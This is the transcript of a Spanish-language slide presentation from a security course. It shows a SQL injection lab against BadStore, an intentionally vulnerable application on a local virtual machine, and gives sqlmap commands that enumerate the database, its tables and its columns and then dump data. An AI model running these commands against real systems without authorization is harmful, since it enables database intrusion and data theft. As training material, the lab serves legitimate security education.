Download - Ataque por inyección de código sql

Transcript
Page 1: Ataque por inyección de código sql

Especialización en Seguridad Informática

Ataque por inyección de código SQL,

JOSÉ ALFREDO RAMÍREZ PRADA

Espinal, Septiembre de 2014

Page 2: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

Una vez instalada la máquina virtual se procede a la configuración para instalar BadStore, se instala la aplicación Python 2.7.8.

Page 3: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

una vez iniciada la maquina virtual "BADSTORE", por medio del comando IFCONFIG, obtenemos la dirección IP (192.168.56.101) a la cual acceder desde nuestro explorador, con el fin de identificar las vulnerabilidades de Sql Injections, por ejemplo se introduce una comilla en el campo “Search” del formulario "What´s New", y observamos un mensaje de error SQL.

Page 4: Ataque por inyección de código sql

Ataque a la base de datos de BadstoreIdentificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:\sqlmap

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" --current-db

Se confirma la vulnerabilidad  y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 4 y el servidor Web Apache 1.3.28, el nombre de la base de datos 'BADSTOREDB'.

Page 5: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando:

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb --tables

Page 6: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

una vez identificada la tabla (itemdb) podremos identificar información de las columnas y de los campos, correspondientemente con los siguientes comandos:

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb -T itemdb --columns

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb -T itemdb -C ldesc --dump

Page 7: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

De esta forma obtenemos toda la información sobre la base de datos de Badstore.

Page 8: Ataque por inyección de código sql

Especialización en Seguridad Informática

GRACIAS POR SU ATENCIÓN